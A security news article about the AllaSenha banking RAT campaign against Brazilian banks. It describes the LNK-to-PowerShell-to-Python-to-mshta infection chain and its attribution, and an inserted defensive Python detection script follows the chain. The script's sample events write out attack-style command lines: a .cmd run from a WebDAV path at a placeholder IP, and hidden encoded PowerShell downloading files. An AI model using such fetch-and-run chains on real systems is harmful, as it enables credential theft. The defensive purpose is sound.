Brazilian Banks Under Siege: AllaSenha RAT Threatens Financial Security

Brazilian banking institutions are currently under assault from a sophisticated new malware campaign distributing a custom variant of the AllaKore remote access trojan (RAT), known as AllaSenha. This advanced threat specifically aims to steal credentials required for accessing Brazilian bank accounts, leveraging Microsoft’s Azure cloud as its command-and-control (C2) infrastructure.

Targeted Institutions and Attack Vector
The targets of this malicious campaign include prominent banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. Although the initial access vector is not definitively confirmed, it is suspected that phishing messages containing malicious links are being used to compromise systems.

The attack initiates with a malicious Windows shortcut (LNK) file disguised as a PDF document (“NotaFiscal.pdf.lnk”), hosted on a WebDAV server since at least March 2024. When the LNK file is executed, it runs a Windows command shell to open a decoy PDF file while simultaneously retrieving a BAT payload named “c.cmd” from the same server.

This BAT payload, known as the BPyCode launcher, executes a Base64-encoded PowerShell command. This command downloads the Python binary from the official Python website and uses it to run a Python script codenamed BPyCode. BPyCode acts as a downloader for a dynamic-link library (“executor.dll”), which is retrieved from domain names generated by a domain generation algorithm (DGA) tied to the Microsoft Azure Functions service.

The downloaded DLL is executed in memory, leading to the deployment of AllaSenha by injecting it into a legitimate mshta.exe process. AllaSenha is designed to steal online banking account credentials from web browsers, display overlay windows to capture two-factor authentication (2FA) codes, and even trick victims into scanning a QR code to approve fraudulent transactions.
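As an added illustration (not code from the original article or from HarfangLab's report), the following Python script shows how a defender could turn the infection chain just described into host-based detection logic. It decodes a PowerShell -EncodedCommand argument, checks Sysmon-style process-creation events for each stage (cmd.exe opening a decoy PDF while running a .cmd from a UNC/WebDAV path, encoded PowerShell fetching Python from python.org, python.exe launched by PowerShell, mshta.exe spawned by python.exe) and correlates the hits per host so that a single legitimate "python from PowerShell" launch does not alert on its own. The event field names, the sample events, the IP address and file paths, and the two-stage alert threshold are assumptions constructed for this example.

```python
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Process-creation events in a Sysmon-like shape. The field names are an
# assumption modelled on Sysmon Event ID 1; all values are constructed.
@dataclass
class ProcEvent:
    host: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str        # command line of the created process


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Decode the payload of a PowerShell -EncodedCommand (Base64 of UTF-16LE)."""
    m = re.search(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def stage_lnk_launcher(ev: ProcEvent) -> bool:
    """cmd.exe opening a decoy .pdf while running a .cmd from a UNC (WebDAV) path."""
    cl = ev.cmdline.lower()
    return (ev.image.lower().endswith("\\cmd.exe")
            and ".pdf" in cl
            and re.search(r"\\\\\S+\.cmd\b", cl) is not None)


def stage_encoded_ps_python_fetch(ev: ProcEvent) -> bool:
    """powershell.exe with an encoded command that downloads Python from python.org."""
    if not ev.image.lower().endswith("\\powershell.exe"):
        return False
    script = decode_encoded_powershell(ev.cmdline)
    if script is None:
        return False
    s = script.lower()
    return "python.org" in s and ("downloadfile" in s or "invoke-webrequest" in s)


def stage_python_from_powershell(ev: ProcEvent) -> bool:
    """python.exe launched by PowerShell (the BPyCode stage)."""
    return (ev.image.lower().endswith("\\python.exe")
            and ev.parent_image.lower().endswith("\\powershell.exe"))


def stage_mshta_from_python(ev: ProcEvent) -> bool:
    """mshta.exe spawned by python.exe: the process the final payload is injected into."""
    return (ev.image.lower().endswith("\\mshta.exe")
            and ev.parent_image.lower().endswith("\\python.exe"))


STAGES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("lnk_launcher", stage_lnk_launcher),
    ("encoded_ps_python_fetch", stage_encoded_ps_python_fetch),
    ("python_from_powershell", stage_python_from_powershell),
    ("mshta_from_python", stage_mshta_from_python),
]


def evaluate(events: List[ProcEvent]) -> Dict[str, List[str]]:
    """Return, per host, the chain stages that fired, in event order."""
    fired: Dict[str, List[str]] = {}
    for ev in events:
        for name, rule in STAGES:
            if rule(ev):
                fired.setdefault(ev.host, []).append(name)
    return fired


def verdict(stages_fired: List[str]) -> str:
    """One stage alone (e.g. a developer running python from PowerShell) is a weak
    signal; two or more distinct stages on a host is treated as a likely chain.
    The threshold of two is an assumption for this example."""
    distinct = len(set(stages_fired))
    return "high" if distinct >= 2 else ("low" if distinct == 1 else "none")


def _encode_ps(script: str) -> str:
    """Build the Base64(UTF-16LE) form PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: hostA shows the whole chain, hostB only a
# developer's legitimate python launch. The IP, paths and URL are placeholders.
_PS_SCRIPT = ("(New-Object Net.WebClient).DownloadFile("
              "'https://www.python.org/ftp/python/PLACEHOLDER/python-embed.zip',"
              "'C:\\Users\\Public\\py.zip')")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("hostA", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r'cmd.exe /c start "" "\\203.0.113.10@80\pub\NotaFiscal.pdf" & \\203.0.113.10@80\pub\c.cmd'),
    ProcEvent("hostA", _PS, r"C:\Windows\System32\cmd.exe",
              "powershell.exe -NoP -w hidden -enc " + _encode_ps(_PS_SCRIPT)),
    ProcEvent("hostA", r"C:\Users\Public\python\python.exe", _PS,
              r"python.exe C:\Users\Public\python\PLACEHOLDER_script.py"),
    ProcEvent("hostA", r"C:\Windows\System32\mshta.exe", r"C:\Users\Public\python\python.exe",
              "mshta.exe"),
    ProcEvent("hostB", r"C:\Python312\python.exe", _PS, "python.exe manage.py runserver"),
]

if __name__ == "__main__":
    for host, stages in evaluate(SAMPLE_EVENTS).items():
        print(host, verdict(stages), stages)
```

Run as a script it reports hostA as "high" with all four stages and hostB as "low"; feeding real Sysmon or EDR process events into evaluate() only requires mapping their fields onto ProcEvent.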

Origins and Attribution
HarfangLab, a French cybersecurity company, attributes the creation of AllaSenha to two Brazilian threat actors. The analysis revealed operational mistakes during domain registration, exposing the identities of the individuals involved. Further investigation linked one of the actors to other companies and uncovered a criminal record for the second actor. This group has been active since at least 2023, with a noticeable increase in activity from February 2024.

Broader Implications
This malware campaign is part of a broader trend of cybercriminal activity targeting financial institutions in Latin America. Similar campaigns, such as those distributing the Casbaneiro banking trojan, highlight the persistent threat posed by region-specific cyber threats. These campaigns often exploit legitimate services like Autodesk A360 Drive and GitHub to host malicious payloads, complicating detection and mitigation efforts.

To defend against such sophisticated threats, it is imperative for organizations, especially banking institutions, to adopt comprehensive cybersecurity measures:

Regular Software Updates: Ensure all systems are up-to-date with the latest security patches.
Advanced Email Filtering and Web Security: Implement robust email and web filtering solutions to block phishing attempts.
Employee Training: Conduct regular cybersecurity awareness training to help employees recognize and respond to phishing attempts.
Network Monitoring: Continuously monitor network traffic for unusual activity that may indicate a compromise.
Incident Response Plan: Develop and regularly update an incident response plan to quickly address and mitigate security breaches.

As cyber threats continue to evolve, staying informed and proactive is essential. The discovery of AllaSenha underscores the importance of vigilance and robust security practices in safeguarding financial institutions and their customers from emerging threats.
